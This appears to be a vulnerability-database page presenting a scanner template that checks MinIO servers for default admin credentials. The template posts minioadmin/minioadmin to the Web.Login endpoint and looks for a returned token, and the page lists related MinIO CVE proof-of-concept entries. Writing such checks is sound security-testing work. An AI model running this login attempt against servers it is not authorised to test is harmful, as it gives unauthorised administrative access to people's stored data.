minio-default-password: Minio Default Password

漏洞描述

PoC代码[已公开]

id: minio-default-password

info:
  name: Minio Default Password
  author: pikpikcu
  severity: high
  description: |-
    Minio default admin credentials were discovered.
  verified: true
  reference:
    - https://docs.min.io/cn/
  tags: minio,default-login
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /minio/webrpc
      headers:
        Content-Type: application/json
      body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
    expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b'"result":') && response.body.bcontains(b'"token":') && response.body.bcontains(b'"jsonrpc":')
expression: r0()

相关漏洞推荐

• POC CVE-2021-21287: MinIO Browser API - Server-Side Request Forgery
• POC CVE-2021-41266: MinIO Operator Console Authentication Bypass
• POC CVE-2023-28432: MinIO Cluster Deployment - Information Disclosure
• POC CVE-2023-2982: Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass
• POC CVE-2025-31489: MinIO - Incomplete Signature Validation for Unsigned-Trailer Uploads
• POC CVE-2021-21287: MinIO Browser API - Server-Side Request Forgery
• POC CVE-2023-28432: MinIO 未授权信息泄露
• POC minio-default-login: Minio Default Login
• POC minio-browser: MinIO Browser
• POC minio-console: MinIO Console
• MinIO Console 存在认证绕过漏洞（CVE-2021-41266）
• MinIO Browser弱口令漏洞
• MinIO verify 接口敏感信息泄露漏洞（CVE-2023-28432）